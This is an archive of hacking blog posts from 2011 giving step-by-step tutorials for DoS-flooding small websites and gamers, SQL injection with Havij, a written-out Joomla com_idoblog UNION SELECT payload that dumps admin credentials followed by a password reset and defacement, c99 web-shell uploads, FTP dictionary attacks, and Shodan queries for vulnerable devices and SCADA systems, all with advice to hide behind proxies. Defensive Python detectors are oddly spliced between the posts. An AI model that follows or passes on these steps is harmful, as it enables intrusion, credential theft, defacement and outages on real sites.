Showing posts with label Website Hacking. Show all posts

Tuesday, May 31, 2011

HOW TO CRASH SMALL WEBSITES USING RDOS OR DDOS - COMPLETE TUTORIAL

TOOLS REQUIRED:

Port Scanner
rDos


Step One: First we need to find the website's IP address. This is very easy to do.

OK, so say the URL is http://www.yoursite.com. Now that you have your URL, open up CMD: press Start > Run > cmd. Once you have CMD open, type ping http://www.yoursite.com, press Enter, and you will get the IP of the website. (YOU MUST REMOVE HTTP:// AND ANY /'s).

EXAMPLE:



Step Two: Now we must test to see if port 80 is open (it usually is).

This is very easy to do too. OK, open up the port scanner you downloaded.
Once in the port scanner, type in your victim's IP that you got from step 1.
It will ask you to do a range scan or a full scan (SELECT RANGE SCAN!). It will ask for confirmation; you have to use a capital Y or a capital N! Now enter 79 for the lowest port and 81 for the highest, hit Enter, then hit capital Y.


[X] = Closed
[X] Vulnerable = Open


Step Three:
The final and easiest step (IF PORT 80 IS CLOSED PICK A NEW SITE!)
If port 80 is open, you're on your way to crashing!!

OK, open up rDos that you downloaded.
Enter the IP that we got from step 1.
It will ask you for the port to attack; use port 80, which is why we scanned to make sure 80 was open! If it is closed it will not work.
Hit Enter.
* = Flooding
- = Crashed or didn't connect!


EXAMPLE:



The site won't be offline straight away!!
It starts with ***********
Be patient. After some time it will go like this: **********-----------

This means the site crashed.

Friday, May 27, 2011

HOW TO APPLY SQL INJECTION THROUGH HAVIJ V1.14

1. First find a SQL-infected site (a website vulnerable to injection).
2. Open Havij and copy and paste the infected link as shown in the figure.

3. It then shows some messages. Watch them and be patient for some time while it finds whether the site is vulnerable, the type of injection and whether the DB server is MySQL; it will then find the database name, which looks like xxxx_xxxx.

[Image: thirdk.jpg]

4. Then move to another operation to find the tables by clicking "Tables" as shown in the figure. Now click "Get tables", then wait some time if needed.

[Image: 37846594.jpg]

5. After the tables are found, you can see there will be a "users" table. Put a mark on it and click the "Get columns" tab as shown in the figure.

[Image: 4tgh.jpg]


6. There, just mark username and password and click "Get data".

[Image: 5tht.jpg]


8. Bingo! You now have the id and pass, which may be the admin's...
The pass will come as an md5 hash; you can also crack it using this tool as shown in the figure...


[Image: srfile201088142733796.jpg]


HOW TO HACK A WEBSITE USING SQL MAP - AUTOMATIC SQL INJECTION TOOL

Today I am going to write about a SQL injection tool. Its v0.9 has just been released. There are many changes in this tool from its previous version. SQL injection is one of the top web application vulnerabilities. It's very important to check a website against this vulnerability.
sqlmap is an open source penetration testing tool that automates the process of detecting and exploiting SQL injection flaws and taking over of database servers. It comes with a kick-ass detection engine, many niche features for the ultimate penetration tester and a broad range of switches lasting from database fingerprinting, over data fetching from the database, to accessing the underlying file system and executing commands on the operating system via out-of-band connections.

Download Here:
http://sourceforge.net/projects/sqlmap/files/

HOW TO HACK A WEBSITE USING C99 SCRIPT

The c99 shell script is a very good way to hack a PHP-enabled web server. You have to find an unsecure uploader to upload this file to the server. By unsecure uploader I mean an uploader which doesn't check the file extension and allows us to upload our executable scripts to the server.

This c99 shell allows an attacker to hijack the PHP-enabled web server. The script is very user friendly and has a very good interface, so it is easy to use. You can issue any PHP command to run on the web server. You can use any of the commands given in the script to run on the web server.

NOTE: This post is only for educational purposes. We advise you not to try this on any website. Use of this script on any website is illegal.

For hacking a website using C99 script follow these steps.

1) Find a php web site with an uploader.
2) Test the file uploader to be secure or not by uploading files with a server executable extension.
3) If uploader is unsecure then upload the shell script.
4) Execute the uploaded code by navigating to the uploaded page.
5) A c99 script GUI will show up with a lot of options and details.
6) Look in the server details to see whether safe mode is on or off. If safe mode is off, then the entire web server can be controlled by the script. If it's on, then only the directory in which the c99 shell script is uploaded can be controlled by the script.
7) Apart from being able to chmod, modify and delete files c99 also lets its user brute force the ftp but it requires an additional dictionary file which can run into hundreds of MBs.
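The uploader weakness described above (no check of the file extension) is what the checks below close. This is an added example, not code from the original post; it is written in Python to show the logic, and `validate_upload`, the allow-list and the sample inputs are assumptions made for illustration.

```python
import secrets
from collections import namedtuple

# Allow-list: final extension -> leading bytes the content must start with.
ALLOWED_TYPES = {
    ".jpg": (b"\xff\xd8\xff",),
    ".jpeg": (b"\xff\xd8\xff",),
    ".png": (b"\x89PNG\r\n\x1a\n",),
    ".gif": (b"GIF87a", b"GIF89a"),
}

# Extensions a web server may hand to an interpreter (not exhaustive).
SERVER_EXECUTABLE = {".php", ".php3", ".php4", ".php5", ".phtml", ".phar",
                     ".pl", ".cgi", ".py", ".asp", ".aspx", ".jsp", ".sh"}

Decision = namedtuple("Decision", "accepted reason stored_name")


def validate_upload(client_name, data):
    """Decide whether an uploaded file may be stored, and under which name."""
    # The client-supplied name must be a bare file name, never a path.
    if not client_name or any(c in client_name for c in "/\\\x00"):
        return Decision(False, "path separator or NUL in file name", None)

    parts = client_name.lower().split(".")
    if len(parts) < 2 or not parts[0] or not parts[-1]:
        return Decision(False, "missing extension or dotfile", None)

    # Check every extension, not only the last one: some server
    # configurations pick a handler from any extension in the name,
    # so "avatar.php.jpg" can still be run as a script.
    extensions = ["." + p for p in parts[1:]]
    if any(ext in SERVER_EXECUTABLE for ext in extensions):
        return Decision(False, "server-executable extension", None)

    final = extensions[-1]
    if final not in ALLOWED_TYPES:
        return Decision(False, "extension not on allow-list", None)

    # The content must look like the type the extension claims.
    if not data.startswith(ALLOWED_TYPES[final]):
        return Decision(False, "content does not match extension", None)

    # A valid image header can be followed by script text.
    if b"<?php" in data.lower():
        return Decision(False, "embedded PHP open tag", None)

    # Never reuse the client's name: store under a random one.
    return Decision(True, "accepted", secrets.token_hex(16) + final)


# Constructed sample uploads (file name, content).
SAMPLES = [
    ("c99.php", b"<?php /* constructed placeholder */ ?>"),
    ("avatar.php.jpg", b"\xff\xd8\xff\xe0" + b"\x00" * 16),
    ("avatar.jpg", b"<?php echo 1; ?>"),
    ("avatar.gif", b"GIF89a<?php echo 1; ?>"),
    ("avatar.png", b"\x89PNG\r\n\x1a\n" + b"\x00" * 16),
]


def review(samples):
    """Return (file name, decision reason) for each sample upload."""
    return [(name, validate_upload(name, data).reason) for name, data in samples]


if __name__ == "__main__":
    for name, reason in review(SAMPLES):
        print(f"{name:16} {reason}")
```

Accepted files belong under the generated name in a directory from which the web server does not execute scripts.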

NOTE: You can also execute this script on the web server by RFI

Search for and download the script from Google, or download it from the link
c99
but the link above may not work because the script will soon be deleted by the file host.

HOW TO HACK JOOMLA CMS WEBSITE - COMPLETE TUTORIAL

Tools required:
SQL-i Knowledge
reiluke SQLiHelper 2.7: http://filetram.com/download/file/4390169166/sqlihelper-2-rar
Joomla! Query Knowledge

DISCLAIMER:
THIS TUTORIAL IS FOR EDUCATIONAL PURPOSES ONLY!!! YOU MAY NOT READ THIS TUTORIAL IF YOU DON'T UNDERSTAND AND AGREE TO THIS DISCLAIMER. I, AS AUTHOR OF THIS TUTORIAL, WILL NOT BE HELD RESPONSIBLE FOR THE MISUSE OF THE INFORMATION CONTAINED WITHIN THIS TUTORIAL. IF YOU ABUSE THIS TUTORIAL FOR ILLEGAL PURPOSES I WILL NOT BE HELD RESPONSIBLE FOR ANY ACTION THAT MAY BE TAKEN AGAINST YOU AS A RESULT OF YOUR MISUSE.

NOTE:
USE ANONYMOUS PROXY!!!

Introduction

Joomla! as a Stable-Full Package is probably unhackable, and if someone says they HACKED Joomla, they are talking rubbish!!!
But people still hack sites that use Joomla as a Content Management System?!?
Joomla is made of components and modules, and there are some developers apart from the official team that offer their own solutions to improve Joomla. Those components and modules made by the other developers are the weak spots!

We hacked a site that used Joomla! v1.5.6 and after that v1.5.9 through IDoBlog v1.1, but I can't say that I hacked Joomla!

Finding Exploit And Target

Those two steps could go in a different order, depending on what you find first, target or exploit...

Google dork: inurl:"option=com_idoblog"
Comes up with results for about 140,000 pages

[Image: 001cv.png]

At inj3ct0r.com search for: com_idoblog
It gives us back Joomla Component idoblog 1.1b30 (com_idoblog) SQL Injection Vuln

[Image: 002rg.png]

==
Joomla Component idoblog 1.1b30 (com_idoblog) SQL Injection Vuln
==

index.php?option=com_idoblog&task=profile&Itemid=1337&userid=62+union+select+1,concat_ws(0x3a,username,password),3,4,5,6,7,8,9,10,11,12,13,14,15,16+from+jos_users--

Exploit can be separated in two parts:

Part I
index.php?option=com_idoblog&task=profile&Itemid=1337&userid=62
This part opens the blog Admin page, and if the Admin page doesn't exist, the exploit won't work (not completely confirmed)

Part II
+union+select+1,concat_ws(0x3a,username,password),3,4,5,6,7,8,9,10,11,12,13,14,15,16+from+jos_users--
This part looks for the username and password in the jos_users table

Testing Vulnerability

Disable images for faster page loading:
[Firefox]
Tools >> Options >> Content (tab menu) >> and unclick 'Load images automatically'

Go to:
Code:
http://www.site.com/index.php?option=com_idoblog&view=idoblog&Itemid=22
Site load normally...

Go to:
Code:
http://www.site.com/index.php?option=com_idoblog&task=profile&Itemid=1337&userid=62
Site content blog Profile Admin

Go to:
Code:
http://www.site.com/index.php?option=com_idoblog&task=profile&Itemid=1337&userid=62+union+select+1--
Site is vulnerable
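Seen from the server side, the test requests above stand out in an access log because `userid` and `Itemid` stop being plain integers. The following added example (not part of the original tutorial) flags such requests; the log format, the sample lines and the assumption that both parameters are always numeric are constructed for illustration.

```python
import re
from collections import namedtuple
from urllib.parse import urlsplit, parse_qs

# Assumption: in legitimate com_idoblog requests these carry digits only.
INTEGER_PARAMS = ("userid", "Itemid")

# Combined-log-style access line (constructed format for this example).
LINE_RE = re.compile(
    r'^(?P<ip>\S+) \S+ \S+ \[[^\]]+\] '
    r'"(?:GET|POST|HEAD) (?P<target>\S+) HTTP/[\d.]+" (?P<status>\d{3})'
)

# What a non-integer value contains, checked after URL decoding.
MARKERS = {
    "union_select": re.compile(r"\bunion\b.+?\bselect\b", re.I | re.S),
    "comment_terminator": re.compile(r"--|#|/\*"),
    "users_table": re.compile(r"\bjos\w*_users\b", re.I),
    "quote": re.compile(r"['\"]"),
}

Finding = namedtuple("Finding", "ip status param value markers")


def inspect_line(line):
    """Return a Finding for every integer parameter that is not an integer."""
    m = LINE_RE.match(line)
    if not m:
        return []
    # parse_qs URL-decodes the values ('+' becomes a space).
    query = parse_qs(urlsplit(m.group("target")).query)
    if "com_idoblog" not in query.get("option", []):
        return []
    findings = []
    for param in INTEGER_PARAMS:
        for value in query.get(param, []):
            if re.fullmatch(r"[0-9]+", value):
                continue
            markers = sorted(n for n, rx in MARKERS.items() if rx.search(value))
            findings.append(Finding(m.group("ip"), int(m.group("status")),
                                    param, value, markers))
    return findings


def scan(lines):
    """Run inspect_line over a whole log and collect the findings in order."""
    return [f for line in lines for f in inspect_line(line)]


# Constructed log lines; the request paths are the ones shown on this page.
SAMPLE_LOG = [
    '198.51.100.7 - - [31/May/2011:10:00:01 +0000] "GET /index.php?'
    'option=com_idoblog&view=idoblog&Itemid=22 HTTP/1.1" 200 5120',
    '198.51.100.7 - - [31/May/2011:10:00:09 +0000] "GET /index.php?'
    'option=com_idoblog&task=profile&Itemid=1337&userid=62 HTTP/1.1" 200 4801',
    '203.0.113.9 - - [31/May/2011:10:02:11 +0000] "GET /index.php?'
    'option=com_idoblog&task=profile&Itemid=1337&userid=62+union+select+1--'
    ' HTTP/1.1" 200 4790',
    '203.0.113.9 - - [31/May/2011:10:02:40 +0000] "GET /index.php?'
    'option=com_idoblog&task=profile&Itemid=1337&userid=62+union+select+1,'
    'concat_ws(0x3a,username,password),3,4,5,6,7,8,9,10,11,12,13,14,15,16'
    '+from+jos_users-- HTTP/1.1" 200 4933',
]

if __name__ == "__main__":
    for f in scan(SAMPLE_LOG):
        print(f.ip, f.status, f.param, f.markers)
```

The same digits-only rule, applied to the parameter before it reaches the query, is the matching server-side validation.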

Inject Target

Open reiluke SQLiHelper 2.7
In Target copy
Code:
http://www.site.com/index.php?option=com_idoblog&task=profile&Itemid=1337&userid=62
and click on Inject
Follow standard steps until you find Column Name, as a result we have

[Image: 003bd.png]

Notice that the exploit from inj3ct0r wouldn't work here because it looks for the jos_users table and, as you can see,
our target uses the jos153_users table for storing data

Let's dump username, email, password from Column Name jos153_users. Click on Dump Now

[Image: 004k.png]

username: admin
email: info@site.com
password: 169fad83bb2ac775bbaef4938d504f4e:mlqMfY0Vc9KLxPk056eewFWM13vEThJI

Joomla! 1.5.x uses md5 to hash the passwords. When the passwords are created, they are hashed with a
32 character salt that is appended to the end of the password string. The password is stored as
{TOTAL HASH}:{ORIGINAL SALT}. So hacking that password takes time and more time...

The easiest way to hack is to reset Admin password!

Admin Password Reset

Go to:
Code:
http://www.site.com/index.php?option=com_user&view=reset
This is standard Joomla! query for password reset request

[Image: 005hy.png]

Forgot your Password? page will load.
In E-mail Address: enter the admin email (in our case it is: info@site.com) and press Submit.
If you found the right admin email, the Confirm your account. page will load, asking for Token:

Finding Token

To find token go back to reiluke SQLiHelper 2.7 and dump username and activation from Column Name jos153_users

[Image: 006fj.png]

username: admin
activation: 5482dd177624761a290224270fa55f1d

5482dd177624761a290224270fa55f1d is a 32 char verification token; enter it and press Submit.

[Image: 007pa.png]

If you have done everything OK, the Reset your Password page will load. Enter your new password...

After that go to:
Code:
http://www.site.com/administrator/
Standard Joomla portal content management system

Enter username admin and your password, click on Login
Go to Extensions >> Template Manager >> Default Template Name >> Edit HTML
In Template HTML Editor insert your defaced code, click Apply, Save and you are done!!!

[Image: 008bo.png]

To make admin life more miserable, click on admin in main Joomla window and in User Details page change admin E-mail

[Image: 009kw.png]

UDP UNICORN FLOODER

http://sourceforge.net/projects/udpunicorn/
This handy little flooder is capable of sending very high amounts of UDP data over your connection to a host. This will result in the host that is being flooded replying with a large amount of ICMP packets, eventually causing a Denial of Service attack against your target. A problem with this type of attack is that the host you're attacking is replying to your IP address with all this ICMP traffic. You can block it in your firewall to make the attack more effective.

As with any attack designed to cause a Denial of Service, it is always much better to be on a faster connection than the host you're attacking. So attacking, let's say, google.com is pointless with just one user. But you can, for example:

Say you have a few people you know on "XBOX LIVE"; you can get their IP addresses (this is covered elsewhere on STING IT) and hit certain ports on their connection to cause them a massive ping time out.

But more recently, with the emergence of "anonymous", it is becoming more frequent that groups of similar minded people are involving themselves in large scale Denial of Service attacks.

Sunday, May 22, 2011

HOW TO REMOVE SURVEYS & OFFERS FROM WEB PAGES

COPY THIS CODE, PASTE IT INTO UR BROWSER'S ADDRESS BAR & PRESS ENTER:-

OR VISIT http://survey-remover.com/ AND DOWNLOAD THE TOOLS...

Thursday, May 19, 2011

BANNER GRABBING

Now that the hacker has a full list of services running on the target system, to be able to exploit them, he has to first figure out what software and version the service is. One way the hacker can get this information, is to telnet into service port. In the example below, we will use command prompt on Windows (Start -> Run -> Type “cmd” -> Enter). If you are on a Mac, you will be using the terminal. Note: If you are using Windows Vista, then telnet is not installed by default. You can install it by doing the following simple steps.

o Click Start then select Control Panel.
o Select Programs and Features.
o Select Turn Windows features on or off.
o Select the Telnet Client option and click OK.
o A box will appear to confirm installation. The telnet command should now be installed

1. First, the hacker would choose one of the open ports that were revealed in the Nmap scan to continue with and attempt to exploit. Let’s say that when the hacker scanned his target, he found the port 21 open. As you can see on the chart above, port 21 is FTP. To find out what FTP software is running he would use telnet by running the command:
telnet www.targetsite.com 21

As you can see above, I ran this against my computer (localhost). So a hacker would insert a target URL in place of localhost.

2. Next, it would connect to the target and display a banner telling the hacker the software and its version as shown below. This is the information the hacker needs to continue and begin searching for vulnerabilities for the software discovered.

If the above method doesn’t work for you, then simply use Nmap’s full version detection option to get the information.

WHAT IS PORT SCANNING

The point of port scanning a server is to detect its open ports and the services listening on them. Once a hacker knows all the services running on your server, he could search for possible vulnerabilities they may have and exploit them to take control of your website. In the port scanning example we will use the most popular port scanner: Nmap. The Nmap Security Scanner is available for both Mac and Windows users: http://nmap.org/download.html . The example will be shown using the Nmap GUI (Graphical User Interface), otherwise known as Zenmap.

1. First the hacker would choose a target and place it in the target box. As you can see the “Command:” section gets updated as well. This is what the command would look like if you were running the CLI version.

2. Next the hacker would choose the “Profile:”, or in other words, the scan type. A smart hacker would go with a quick and quiet scan. Full version detection scans are very loud and could raise suspicion on the other end. Stay away from those options because as you will see later on, there are other ways to get that information.

3. A sample scan result may look like the following:

4. As you can see it found a few open ports and listed the services that are run on them. Below I have a list of some of the most popular ports/services on the internet.


20 FTP data (File Transfer Protocol)
21 FTP (File Transfer Protocol)
22 SSH (Secure Shell)
23 Telnet
25 SMTP (Send Mail Transfer Protocol)
43 whois
53 DNS (Domain Name Service)
68 DHCP (Dynamic Host Control Protocol)
80 HTTP (HyperText Transfer Protocol)
110 POP3 (Post Office Protocol, version 3)
137 NetBIOS-ns
138 NetBIOS-dgm
139 NetBIOS
143 IMAP (Internet Message Access Protocol)
161 SNMP (Simple Network Management Protocol)
194 IRC (Internet Relay Chat)
220 IMAP3 (Internet Message Access Protocol 3)
443 SSL (Secure Socket Layer)
445 SMB (NetBIOS over TCP)
1352 Lotus Notes
1433 Microsoft SQL Server
1521 Oracle SQL
2049 NFS (Network File System)
3306 MYSQL
4000 ICQ
5800 VNC
5900 VNC
8080 HTTP

5. Along with finding out what ports are running, the hacker needs to also find out what operating system the server is running. There are always a lot of operating system vulnerabilities out there to choose from. So by knowing the operating system, the hacker’s chances of taking over the server go up.

As you can see, there is an option on Nmap to detect the operating system, but this scan is very loud and easily detected so it is better to avoid it if possible. A simple way to determine what the server is running is by getting a 404 error page. You can get there by going to a page that doesn’t exist. For example the hacker would put in “www.targetsite.com/asdlfjasl.php” this page will most likely not exist and bring him to the 404 page. On most sites the 404 error page displays the server operating system along with its version. Many sites nowadays don’t display this by putting up custom 404 pages so this may not always work.

6. If you are planning on using the CLI version of Nmap, or want a more in depth look at all the commands take a look at the Nmap manual: http://nmap.org/book/man.html .

7. Now that the hacker has got all the running services and open ports on the targets system, he will now have to find out what versions the server is running. This is where “Banner Grabbing” comes in.

WHAT IS FOOTPRINTING

Footprinting is the act of gathering information about a computer system and the companies it belongs to. Footprinting is the first step hackers take in their hacking process. Footprinting is important because to hack a system the hacker must first know everything there is to know about it. Below I will give you examples of the steps and services a hacker would use to get information from a website.

1. First, a hacker would start gathering information on the targets website. Things a hacker would look for are e-mails and names. This information could come in handy if the hacker was planning to attempt a social engineering attack against the company.

2. Next the hacker would get the IP address of the website. By going to http://www.selfseo.com/find_ip_address_of_a_website.php and inserting the web site URL, it will spit out its IP address.

3. Next the hacker would Ping the server to see if it is up and running. There’s no point in trying to hack an offline server. http://just-ping.com pings a website from 34 different locations in the world. Insert the website name or IP address and hit “Ping”. If all packets went through, then the server is up.

4. Next the hacker would do a Whois lookup on the company website. Go to http://whois.domaintools.com and put in the target website. As you can see this gives a HUGE amount of information about the company. You see the company e-mails, address, names, when the domain was created, when the domain expires, the domain name servers, and more!

5. A hacker can also take advantage of search engines to search sites for data. For example, a hacker could search a website through Google by searching “site:www.the-target-site.com”; this will display every page that Google has of the website. You could narrow down the number of results by adding a specific word after it. For example, the hacker could search “site:www.the-target-site.com email”. This search could list several emails that are published on the website. Another search you could do in Google is “inurl:robots.txt”; this would look for a page called robots.txt. If a site has the file “robots.txt”, it displays all the directories and pages on the website that they wish to keep anonymous from the search engine spiders. Occasionally you might come across some valuable information that was meant to be kept private in this file.
Now that the basics of footprinting have been explained.

NESSUS - THE NETWORK VULNERABILITY SCANNER

Nessus vulnerability scanner is the world-leader in active scanners, featuring high-speed discovery, configuration auditing, asset profiling, sensitive data discovery and vulnerability analysis of your security posture. Nessus scanners can be distributed throughout an entire enterprise, inside DMZs and across physically separate networks.


WHAT ARE DICTIONARY ATTACKS

Before I get into the example, you must first know what an FTP server is. FTP stands for File Transfer Protocol. FTP is a simple way to exchange files over the internet. If a hacker got FTP access to my website, he could delete/upload anything he wants on my server. An FTP address looks similar to a website address except it uses the prefix ftp:// instead of http://. I set up an FTP server on my computer so I could demonstrate. You can get Brutus here.
1. First the hacker would choose a target. In this case it’s my home computer and the IP address for your home computer is 127.0.0.1 .
2. By going to ftp://127.0.0.1 I get a pop-up box asking for a username and password.

3. Next the hacker would launch a program similar to Brutus and attempt to crack the password.
4. In the target you put the IP address of the website and to the right select the appropriate option, which in this case is FTP.
5. The default port is 21 but some websites change this to make them a little more secure. If you find out that the port isn’t 21, you can find the right one by doing a port scan. We will get into this later in the book.
6. If you don’t know any of the usernames for the FTP server, then you will have to get a list of the most common usernames.
7. For a dictionary attack you will have to choose the pass mode Word List and browse and select the file containing your word list. You can get some good password lists at packetstormsecurity. Below are examples of what a username and password list might look like.




8. Once you hit Start the program will attempt to connect to the server and begin to try all the possible combinations from your lists.



9. If you’re lucky, eventually it’ll get the right Username:Password combination. As you can see below, it got the correct combination of username – admin and password – password.


10. A smarter hacker would use a proxy when using a program like this. What a proxy does is cloaks your IP address by sending your connection request through another computer before going to the target. This is a smart idea because as you will see in the image below, Brutus leaves a huge log of your presence on the target server.


11. In place of the IP address 127.0.0.1 would be the hackers IP address. Footprints like these get a hacker caught and into a lot of trouble with the law.
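The log trail mentioned in steps 10 and 11 is what a defender uses to spot a dictionary attack. This added example, not from the original text, flags a source address with many failed FTP logins in a short window and notes when a success follows; the one-line-per-attempt log format and the sample entries are constructed for illustration.

```python
from collections import defaultdict, deque
from datetime import datetime, timedelta


def detect_bruteforce(lines, threshold=5, window=timedelta(seconds=60)):
    """Return {source_ip: alert} for sources with >= threshold failed
    logins inside a sliding time window.

    Expected line format (constructed for this example):
        YYYY-MM-DD HH:MM:SS <source-ip> <username> <FAIL|OK>
    """
    recent = defaultdict(deque)   # ip -> timestamps of failures in the window
    tried = defaultdict(set)      # ip -> every username that failed from it
    alerts = {}
    for line in lines:
        fields = line.split()
        if len(fields) != 5 or fields[4] not in ("FAIL", "OK"):
            continue              # not a login record
        ts = datetime.strptime(fields[0] + " " + fields[1], "%Y-%m-%d %H:%M:%S")
        ip, user, result = fields[2], fields[3], fields[4]

        # Drop failures that have aged out of the window.
        failures = recent[ip]
        while failures and ts - failures[0] > window:
            failures.popleft()

        if result == "FAIL":
            failures.append(ts)
            tried[ip].add(user)
            if len(failures) >= threshold and ip not in alerts:
                alerts[ip] = {
                    "start": failures[0],
                    # Same set object as tried[ip], so it keeps growing.
                    "usernames": tried[ip],
                    "success_as": None,
                }
        elif ip in alerts and failures and alerts[ip]["success_as"] is None:
            # A login that succeeds right after a burst of failures means
            # the guessing probably worked: treat that account as compromised.
            alerts[ip]["success_as"] = user
    return alerts


# Constructed sample: one user mistyping a password once, then a burst from
# 127.0.0.1 (the address used in the walkthrough above) ending in a success.
SAMPLE_LOG = [
    "2011-05-19 14:00:01 192.0.2.10 alice FAIL",
    "2011-05-19 14:00:09 192.0.2.10 alice OK",
    "2011-05-19 14:03:00 127.0.0.1 admin FAIL",
    "2011-05-19 14:03:01 127.0.0.1 admin FAIL",
    "2011-05-19 14:03:02 127.0.0.1 root FAIL",
    "2011-05-19 14:03:03 127.0.0.1 admin FAIL",
    "2011-05-19 14:03:04 127.0.0.1 admin FAIL",
    "2011-05-19 14:03:05 127.0.0.1 admin FAIL",
    "2011-05-19 14:03:06 127.0.0.1 admin OK",
]

if __name__ == "__main__":
    for ip, alert in detect_bruteforce(SAMPLE_LOG).items():
        print(ip, alert["start"], sorted(alert["usernames"]), alert["success_as"])
```

The threshold and window are tuning values; an alert with `success_as` set calls for a password reset and a review of what that session did.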

WINAUTOPWN - VERSION 2.4 - DOWNLOAD

This is to announce release of winAUTOPWN version 2.4...

winAUTOPWN is an auto (hacking) shell gaining tool. It can also be used to test IDS, IPS and other Monitoring sensors/softwares...


ADVANCED SQL INJECTION - HAVIJ V1.14

Well, to make SQL injection easier for you I will be using a tool, Havij. It has both a free version and a paid version. In this tutorial I will be demonstrating how to use the free version of Havij. The success rate for this tool is more than 95% on vulnerable websites.

It is an automated SQL injection tool for penetration testers to check whether a website is vulnerable to SQL injection or not. All you need to do is enter the URL of the site that you want to test for the vulnerability and click on the ANALYZE button. It will automatically scan the website for SQL injection.

How to find A vulnerable Website

Go to the Google homepage and search for inurl:php?id=

You will probably get thousands of results. Now open any page and add an apostrophe (') to the
end of the URL. For example, if the URL was http://www.mytargetsite.com/php?id=34 it should
now be http://www.mytargetsite.com/php?id=34'.

If you get a SQL syntax error then this website can be vulnerable to SQL injection.
Now you should use Havij on this URL.

HOW TO HACK AN UNHACKABLE WEBSITE IN SECONDS - EBOOK

Download it from here...

QUERIES ABOUT SHODAN

It is a search engine for the network part.

It is similar to our Google Dorks page.
http://shodan.surtri.com/?q=cisco-IOS

http://shodan.surtri.com/?q=IIS+4.0

http://shodan.surtri.com/?q=Xerver (REF: http://www.exploit-db.com/exploits/9718)

- November 29th 2009

http://shodan.surtri.com/?q=Fuji+xerox

http://shodan.surtri.com/?q=JetDirect


- November 30th 2009

http://shodan.surtri.com/?q=port:23+%22list+of+built-in+commands%22

http://shodan.surtri.com/?q=port%3A80+iisstart.html

- December 1st 2009

http://shodan.surtri.com/?q=Server:%20SQ-WEBCAM

http://shodan.surtri.com/?q=Netgear

http://shodan.surtri.com/?q=%22Anonymous+access+allowed%22

http://shodan.surtri.com/?q=Golden+FTP+Server (REF: http://www.exploit-db.com/exploits/10258)


- December 5th 2009

http://shodan.surtri.com/?q=%22Server%3A+iWeb%22+HTTP (REF: http://packetstormsecurity.org/0912-exploits/iweb-traversal.txt)

- December 8th 2009

http://shodan.surtri.com/?q=Wordpress

http://shodan.surtri.com/?q=Joomla

http://shodan.surtri.com/?q=Drupal
http://shodan.surtri.com/?q=iPhone+Web+Server

http://shodan.surtri.com/?q=FreeBSD

http://shodan.surtri.com/?q=IPCop

- December 23rd 2009

http://shodan.surtri.com/?q=IBM-HTTP-Server

http://shodan.surtri.com/?q=barra_counter_session

http://shodan.surtri.com/?q=BIGipServer

http://shodan.surtri.com/?q=F5-TrafficShield

http://shodan.surtri.com/?q=st8id

http://shodan.surtri.com/?q=profense

http://shodan.surtri.com/?q=X-dotDefender-denied

http://shodan.surtri.com/?q=X-Cnection

http://shodan.surtri.com/?q=nnCoection

http://shodan.surtri.com/?q=Cneonction

- December 24th 2009

http://shodan.surtri.com/?q=PowerDNS (REF: http://www.securityfocus.com/bid/37650)

- January 11th 2009

http://shodan.surtri.com/?q=ADSL+port%3A80

- January 12th 2010

http://shodan.surtri.com/?q=Default+Password

- February 8th 2010

http://www.shodanhq.com/?q=%22X-Powered-By%3A+PHP%22
http://www.shodanhq.com/?q=%22Sagem%22 (REF: http://www.exploit-db.com/exploits/11633)

- March 6th 2010

http://www.shodanhq.com/?q=vFTPd+1.31 (REF: http://www.exploit-db.com/exploits/11293)

- March 21st 2010

http://www.shodanhq.com/?q=KM-MFP-http (Thanks to: http://www.twitter.com/Motoma)
http://www.shodanhq.com/?q=mod_antiloris (This does not work with PyLoris per Motoma.)

- April 10th 2010

http://www.shodanhq.com/?q=X-Powered-By:W3%20Total%20Cache

- July 12th 2010

http://www.shodanhq.com/?q=port%3A161+simatic

http://www.shodanhq.com/?q=PLC

http://www.shodanhq.com/?q=scada

http://www.shodanhq.com/?q=bacnet

http://www.shodanhq.com/?q=telemetry+gateway

- November 3rd 2010

http://www.shodanhq.com/?q=X-Content-Security-Policy

- March 31st 2011

http://www.shodanhq.com/?q=Jetty%2F3.1.8+%28Windows+2000+5.0+x86%29